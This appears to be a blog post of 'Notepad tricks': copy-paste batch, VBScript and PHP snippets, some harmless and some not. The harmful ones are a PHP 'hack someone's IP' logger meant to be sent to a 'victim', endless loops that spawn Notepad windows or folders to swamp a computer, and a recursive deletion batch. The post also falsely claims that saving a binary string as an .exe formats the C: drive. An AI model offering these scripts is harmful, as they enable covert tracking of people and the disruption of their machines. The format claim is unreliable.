Notepad Tricks


How To Clean Your Computer-PC With Notepad ..


It has clean your system with remove some Unused temporary files, prefetch file ,history , cookies etc.. With any software Used..



1) Open Notepad

2) Copy Below Code And Paste In Notepad

@echo off
del /s /f /q c:\windows\temp\*.* 
rd /s /q c:\windows\temp 
md c:\windows\temp 
del /s /f /q C:\WINDOWS\Prefetch 
del /s /f /q %temp%\*.* 
rd /s /q %temp% 
md %temp% 
deltree /y c:\windows\tempor~1 
deltree /y c:\windows\temp 
deltree /y c:\windows\tmp 
deltree /y c:\windows\ff*.tmp 
deltree /y c:\windows\history 
deltree /y c:\windows\cookies 
deltree /y c:\windows\recent 
deltree /y c:\windows\spool\printers 
del c:\WIN386.SWP 
cls 

3) Save With File Name Clean.bat (.bat is compulsory)

4) Now Open Clean.bat file  (Double Click on file)

How to know Your Product key for your System ..


1) OPEN NOTEPAD

2) COPY BELOW CODE AND PASTE IN NOTEPAD


Set WshShell = CreateObject("WScript.Shell")
MsgBox ConvertToKey(WshShell.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId"))

Function ConvertToKey(Key)
Const KeyOffset = 52
i = 28
Chars = "BCDFGHJKMPQRTVWXY2346789"
Do
Cur = 0
x = 14
Do
Cur = Cur * 256
Cur = Key(x + KeyOffset) + Cur
Key(x + KeyOffset) = (Cur \ 24) And 255
Cur = Cur Mod 24
x = x -1
Loop While x >= 0
i = i -1
KeyOutput = Mid(Chars, Cur + 1, 1) & KeyOutput
If (((29 - i) Mod 6) = 0) And (i <> -1) Then
i = i -1
KeyOutput = "-" & KeyOutput
End If
Loop While i >= 0
ConvertToKey = KeyOutput
End Function


3) SAVE WITH FILE NAME p_key.vbs (.vbs IS COMPULSORY) saving to the desktop for          easy access.


4) NOW OPEN P_key.vbs FILE  (DOUBLE CLICK ON FILE)

Once you’ve saved it, you can just double-click and the popup window will show you your product key.

Note :- If you use CTRL + C when the popup window is active, it will copy the contents of the window to the clipboard, and then you can paste it into Notepad or somewhere else.





A Plane, 2 Buildings,Skeleton. Remember 9/11 !!


1) Open Notepad
2) Type Q33N  in Capital Letters.
3) Increase The Font Size to 72.
4) Change the Font to Wingdings.


It was widely considered as the terrorist s sent the message but USA didn't manage to broke the code.For those who don't know this must be shocking.But this is only a hoax.





Format Your C: Drive (Hard Disk) Using Notepad trick !!


1) Open Notepad
2) Copy Code Below
    01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000
3) Save XYZ.exe (.exe is compulsory)
4) Now Open XYZ.exe(Double Click on XYZ.exe)

here, Your C Drive will be Formarred !
This is a binary fun. Be careful while using it.




Open Continually notepad in Your computer!!


1) Open Notepad
2) Copy Code Below

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

3) Save XYZ.bat (.bat is compulsory)
4) Now Open XYZ.bat(Double Click on XYZ.bat)





Making Personal Diary Using Notepad ...


Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad.




Make Your keyboard led blinking like disco lights...


In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
 
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.





know the gender of your computer...


This is funny trick that let you know the gender of your computer whether it is male or female. This trick work on mostly all windows operating system. So let get started.

How To Do ?

1. Copy the below codes into Notepad and save it as gender.vbs  (.vbs is must)

CreateObject("SAPI.SpVoice").Speak"i love you"


2. Now, open the save file
3. If you hear male voice then your computer is male and if you hear female voice then its female.





How To Hack Someone Ip Address ? 


1. Copy the below codes into Notepad and save it as Grab.php (.php is must)

<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
$number0 = " This is Your IP/Proxy";
$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";
$number2 = " Host/Proxy: $hostname";
$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);

header("Content-type: image/png");
imagepng($img_number);
$file=fopen("Name-here-to-protect-the-File.txt","a");
$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";
fwrite($file, $file2);
fclose($file);
?>   



    2. Now make Free account on any of  the free web hosting sites Ripway or on My3gb .  
    3. Now Upload Grab.php to your web hosting site.
    4. Copy the link of your  uploaded file and send it to victim.
    5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
    6. Enjoy you are Done !!




How To Your Computer in auto Open CD/DVD drive ?



1.Copy the below codes into Notepad and save it as funcd.vbs (.vbs is must)

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5
loop

2. Now, open the save file





HTML with notepad   ...


1.Copy the below codes into Notepad and save it as hello.html (.html is must)

<html><marquee><scrollammount=8><font color=red><font size=10>

          Wel Come!

       </marquee></font></html>

2. Now, open the save file.







How To Make more than thousands of folder Using notepad?..


Copy the below codes into Notepad and save it as fun.bat (.bat is must)

1. Open notepad.
2. Copy the following code:

@echo off
:top
md %random%
goto top

Now, open the save file



    Blogger Comment

0 comments:

Post a Comment